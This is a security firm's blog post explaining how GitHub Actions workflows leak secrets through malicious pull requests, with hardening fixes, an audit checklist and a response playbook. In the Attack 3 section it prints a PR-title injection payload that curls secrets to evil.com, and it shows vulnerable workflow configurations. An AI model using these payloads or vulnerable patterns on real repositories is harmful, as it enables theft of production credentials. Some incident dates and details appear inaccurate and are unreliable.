GitHub Actions: How Pull Requests Exfiltrate Your Production Secrets
GitHub Actions is one of the most over-privileged, under-hardened CI/CD platforms in production. A malicious pull request against a public repo with the wrong workflow configuration can exfiltrate every secret in your GitHub organization. Production AWS keys, Stripe tokens, private repo access, everything. The specific attack patterns, the fix matrix, and the hardening checklist every engineering team should have.
Founder of Valtik Studios. Pentester. Based in Connecticut, serving US mid-market.
Why GitHub Actions is the weakest link in most CI/CD pipelines
GitHub Actions is used by most open source projects and a huge share of commercial engineering teams. It's free, integrated with GitHub, and convenient. It's also the source of multiple catastrophic security incidents over the last few years and, in our audit experience, the single most under-hardened part of most organizations' production infrastructure.
The core problem is architectural. GitHub Actions was designed for convenience: pull requests trigger workflows, workflows run arbitrary code, arbitrary code has access to secrets. Each of those design choices is individually defensible. Combined, they create a system where a single misconfigured workflow can hand your production credentials to anyone who submits a pull request.
This post walks through the specific attack patterns we find on virtually every engineering team's CI/CD audit, why they persist despite being well-known. And the hardening checklist that prevents them.
If your organization uses GitHub Actions. Especially if you've public repositories. At least half of these apply to you.
The attack surfaces
Attack 1: pull_request_target with code checkout
The nuclear option. The pull_request_target trigger is a GitHub Actions event that runs workflows in the context of the base repository with access to secrets, even for pull requests from external forks. It was designed for workflows that need to do things like comment on PRs or trigger automated reviews.
The trap: if a workflow using pull_request_target also checks out the PR's code and executes anything from it, that code now has access to every secret in your repository.
The vulnerable pattern:
on:
pull_request_target:
Jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # checks out PR code
- run: npm install # runs package.json scripts from PR
- run: npm test # runs test code from PR
env:
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
STRIPE_SECRET_KEY: ${{ secrets.STRIPE_SECRET_KEY }}
An attacker submits a pull request that:
- Modifies
package.jsonto add a postinstall script - The postinstall script runs at
npm install - The script exfiltrates
$AWS_SECRET_ACCESS_KEY,$STRIPE_SECRET_KEY, and everything else in the environment
Or more subtly:
- Adds a test file that reads environment variables and exfiltrates them to a webhook
- The workflow runs
npm test, the malicious test runs, secrets leak
The attacker doesn't need commit access. They need to be able to submit a pull request. Something GitHub allows by default to anyone with a GitHub account.
Real-world impact: this exact pattern has been exploited against multiple open source projects and some commercial repos with public visibility. In 2022, Travis CI had a similar class of issue that leaked secrets from 770+ public repositories. GitHub Actions has had its own versions. The pull_request_target class of bug has been exploited repeatedly.
The fix:
- Never check out PR code in a
pull_request_targetworkflow - If you must, use
permissions: read-alland don't set up secrets in that workflow - For testing PR code, use
pull_request(notpull_request_target). That trigger doesn't have access to secrets for external PRs by default - If you need BOTH PR code testing AND some secrets access, split into two workflows:
pull_request workflow tests the code without secrets
- A separate pull_request_target workflow does only the things that need secrets, never touches PR code
Attack 2: Compromised third-party actions
Most GitHub Actions workflows use third-party actions from the GitHub Marketplace. A typical workflow might reference:
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
- uses: some-vendor/some-action@v1
- uses: another-org/another-action@v2
Each of those is code written by someone else, running inside your workflow with access to your workflow's environment. Including secrets.
The compromise vectors:
Compromised maintainer. If a third-party action's maintainer's GitHub account is compromised (credential phishing, session theft, lost hardware with active GitHub sessions), the attacker can publish a malicious new version. Users who pull @v1 or @v2 or @latest automatically get the malicious version on next run.
Compromised upstream dependencies. The action itself depends on npm, Python, Go modules. A supply chain attack on those dependencies (like the 2026 Axios incident) propagates to every workflow using the action.
Deliberately malicious actions. Some actions have been specifically published as trojans, designed to look useful but exfiltrate secrets on install.
Notable incidents:
- 2021:
pull-request-actioncompromise. A popular action had its maintainer's account compromised and a malicious version published. Secrets exfiltrated from many users' workflows. - 2023:
tj-actions/changed-filesincident. A supply chain attack on this popular action led to cryptomining payloads in user workflows. - 2024: multiple typo-squatting actions published that mimicked popular action names with single-character differences.
The fix:
- Pin to full SHA, not tags.
uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29instead of@v4. SHAs can't be moved. Tags can. - Minimize third-party action use. Every third-party action is a trust decision.
- Review third-party actions you depend on. Read the source. Check maintainer history. Verify signing where available.
- Use Dependabot for GitHub Actions updates. It proposes pinned-SHA updates with changelog visibility so you can review upstream changes.
- Use OIDC-based credentials instead of static secrets (see Attack 4) so even a compromised action has limited blast radius.
Attack 3: Workflow injection via PR metadata
Workflow authors sometimes use expressions like ${{ github.event.pull_request.title }} directly in shell commands. PR titles and descriptions are attacker-controlled.
The vulnerable pattern:
steps:
- name: Log PR title
run: echo "PR title is ${{ github.event.pull_request.title }}"
An attacker submits a PR with title:
Fix bug". Curl evil.com/exfil?secret=$AWS_SECRET_ACCESS_KEY. Echo "
The shell interpolation becomes:
echo "PR title is Fix bug". Curl evil.com/exfil?secret=$AWS_SECRET_ACCESS_KEY. Echo ""
The attacker's command runs with full workflow environment access.
Common vulnerable interpolations:
github.event.pull_request.titlegithub.event.pull_request.bodygithub.event.issue.titlegithub.event.issue.bodygithub.event.comment.bodygithub.head_ref(branch names can contain shell metacharacters)github.event.commits[].message(commit messages too)
The fix:
- Use environment variables to pass untrusted data:
steps:
- name: Log PR title
env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: echo "PR title is $PR_TITLE"
Here $PR_TITLE is a shell variable, and shell escaping rules prevent injection.
- CodeQL's built-in scan for GitHub Actions injection issues. Enable in repo settings.
- Static analysis tools like Poutine or Checkov for GitHub Actions catch these patterns.
Attack 4: Overly-scoped secrets
Most teams store all secrets at the organization level with broad access:
AWS_ACCESS_KEY_ID → available to every workflow in every repo
STRIPE_SECRET_KEY → available to every workflow in every repo
DATABASE_URL → available to every workflow in every repo
If any one workflow is compromised, all secrets leak.
The fix: environment-scoped secrets.
GitHub Actions supports secrets scoped to deployment environments. Each environment (production, staging, preview) can have its own secrets, its own protection rules, its own required reviewers.
jobs:
deploy:
environment: production # requires protection rules
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@<SHA>
- run: aws s3 cp...
env:
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} # pulls from prod env
Protection rules for the environment:
- Required reviewers. Deployment can't proceed without approval.
- Wait timer. Deployment delayed by X minutes for monitoring.
- Deployment branches. Only specific branches can deploy.
- Protected secrets. These secrets are unavailable to any other workflow.
With environment-scoped secrets, a compromised PR workflow doesn't have production AWS access.
Better still: OIDC-based credentials.
Instead of storing long-lived AWS access keys in GitHub Secrets, use OIDC federation. GitHub Actions has a built-in OIDC token issuer. AWS (and GCP, Azure) can trust GitHub's OIDC and issue short-lived credentials to specific repositories, branches, or environments.
jobs:
deploy:
permissions:
id-token: write
contents: read
steps:
- uses: aws-actions/configure-aws-credentials@<SHA>
with:
role-to-assume: arn:aws:iam::123456789012:role/deploy-role
aws-region: us-east-1
No static AWS credentials stored in GitHub at all. Each run gets a short-lived credential specific to this workflow + this branch + this run ID. If leaked, the blast radius is limited to the single run.
Attack 5: Self-hosted runner compromise
Self-hosted runners are GitHub Actions runners you operate yourself. Often on corporate infrastructure with access to internal resources unreachable from GitHub's hosted runners.
The trap: self-hosted runners are shared across workflows. If a public repo uses a self-hosted runner, any pull request that triggers a workflow can execute arbitrary code on your runner. If the runner has access to internal systems, the attacker now has access to internal systems.
Worse: runner persistence. GitHub's default self-hosted runner keeps state between jobs. An attacker who runs code on your runner in job 1 can install persistence (modify PATH, install a backdoor, inject into subsequent jobs). The next legitimate deploy using that runner picks up the backdoor.
The fix:
- Never use self-hosted runners for public repositories. GitHub's documentation says this. Teams ignore it. Don't.
- Use ephemeral runners. GitHub Actions supports ephemeral (one-job) runners that destroy themselves after each job. Use this for all self-hosted runners.
- Isolate runners by sensitivity. Separate runner pools for public repos, internal repos, and production-deployment repos. Access controls by runner label.
- Use actions/runner-scaleset-controller or similar for auto-scaling ephemeral runners.
Attack 6: GITHUB_TOKEN over-scoping
Every GitHub Actions workflow gets a GITHUB_TOKEN with permissions on the repository. By default, this token has broad write access.
Malicious code running in a workflow (via any of the above attack paths) can use GITHUB_TOKEN to:
- Push commits to branches
- Create / merge pull requests
- Modify GitHub Actions workflow files themselves (establishing persistence)
- Read/write repo contents
- Trigger additional workflows
- Access other repositories if the token has org-level access
The fix:
- Set default permissions to minimum:
contents: read - Elevate per-job only when needed
# Repository-level default
permissions:
contents: read
Jobs:
test:
# inherits contents: read
...
deploy:
permissions:
contents: read
id-token: write # for OIDC
...
release:
permissions:
contents: write # needs to tag
pull-requests: write
...
Lock down the org-level default too: Organization → Settings → Actions → "Workflow permissions" → "Read repository contents permission".
Attack 7: Cache poisoning
GitHub Actions has a caching system (actions/cache). Caches are scoped to the repository and the branch, but within those scopes they can be restored.
Attack:
- Attacker submits a PR (or compromises a workflow) that populates the cache with malicious content. A poisoned
node_modulesdirectory, compromised build tools, etc. - The cache entry survives beyond the PR.
- Next legitimate workflow that restores the cache pulls the poisoned content.
This has been demonstrated in research and has been exploited in at least one public incident.
The fix:
- Scope caches narrowly (specific paths, specific cache keys)
- Disable cache restoration for sensitive workflows
- Rotate cache keys regularly
- Monitor cache hits for unexpected patterns
The audit checklist
If you're auditing a GitHub Actions setup, work through this list:
Workflow triggers
- Any workflow using
pull_request_target? → verify it doesn't check out or execute PR code - Any workflow using
workflow_run? → verify it doesn't trust arbitrary data from the triggering workflow - Any workflow using
issue_comment? → verify it doesn't execute based on unrestricted commenter input
Third-party actions
- All
uses:statements pinned to full SHA (not tags)? - Dependabot enabled for GitHub Actions updates?
- Review of third-party actions' maintainer history?
Data injection
- Any
${{ ... }}expressions directly inrun:commands that reference attacker-controllable data? - CodeQL enabled for GitHub Actions?
Secrets
- Secrets scoped to environments where appropriate?
- Environment protection rules (required reviewers, deployment branches) configured for production?
- OIDC federation used for cloud providers instead of long-lived keys?
- Any secrets that should be rotated?
GITHUB_TOKEN
- Default permissions set to minimum?
- Each workflow elevates only the specific permissions needed?
Self-hosted runners
- Public repos use GitHub-hosted runners only?
- Self-hosted runners are ephemeral?
- Runner pools isolated by sensitivity?
Cache
- Cache keys narrowly scoped?
- Sensitive workflows opt out of cache restoration?
Tooling that helps
- Poutine. Static analysis for GitHub Actions security issues
- Checkov. Has GitHub Actions rules
- CodeQL. Built into GitHub, detects Actions injection patterns
- GitHub's own Dependabot. Keeps action versions current
- zizmor. Specialized GitHub Actions security auditor
- StepSecurity Harden-Runner. Runtime protection for workflows
- GitHub Actions Runner Controller for Kubernetes-based ephemeral runners
The incident response playbook
If you discover a GitHub Actions compromise:
1. Rotate every secret. Every secret in every environment in every repo in your org. Assume the attacker has exfiltrated everything. This is the most time-consuming part of recovery.
2. Review audit logs. GitHub's audit log shows workflow runs, secret modifications, and access patterns. Search for anomalies in the window of suspected compromise.
3. Check for workflow modifications. The attacker may have modified workflow files to establish persistence. Review all .github/workflows/*.yml changes in the affected repos.
4. Check for cache persistence. Purge all caches in affected repos.
5. Review all recent pull requests. The attack vector may be a malicious PR that triggered the initial compromise. Identify it.
6. Review cross-repo impact. Did the compromised workflow have access to other repos via GITHUB_TOKEN org-level permissions? Trace the scope.
7. Incident disclosure. If customer data or production infrastructure was accessible, your breach disclosure obligations are triggered.
For Valtik clients
Valtik's CI/CD security audits include GitHub Actions review as a core component:
- Workflow security audit. Every workflow reviewed against the attack patterns above
- Secrets architecture review. Environment scoping, OIDC federation readiness, rotation strategy
- Third-party action risk assessment. Dependencies ranked by trust, SHA pinning verification
- Runner infrastructure review. Self-hosted runner security if applicable
- Incident response playbook. Specific to your GitHub Actions stack
If you run GitHub Actions in production. Especially if you've any public repositories. You have at least three of the patterns above live in production right now. The cost of finding them before they're exploited is dramatically lower than the cost of post-incident remediation.
Reach out via https://valtikstudios.com.
Sources
- GitHub Actions Security Documentation
- pull_request_target Security Warning. GitHub Blog
- GitHub Actions Workflow Injection. GitHub Blog
- OIDC Authentication with AWS. GitHub Docs
- tj-actions/changed-files Incident Analysis
- CodeQL Actions Security Queries
- Poutine GitHub Actions Security Scanner
- StepSecurity GitHub Actions Hardening
- NIST SP 800-204D (Strategies for Software Supply Chain Security)
- SLSA. Supply Chain Levels for Software Artifacts
Want us to check your CI/CD setup?
Our scanner detects this exact misconfiguration. plus dozens more across 38 platforms. Free website check available, no commitment required.
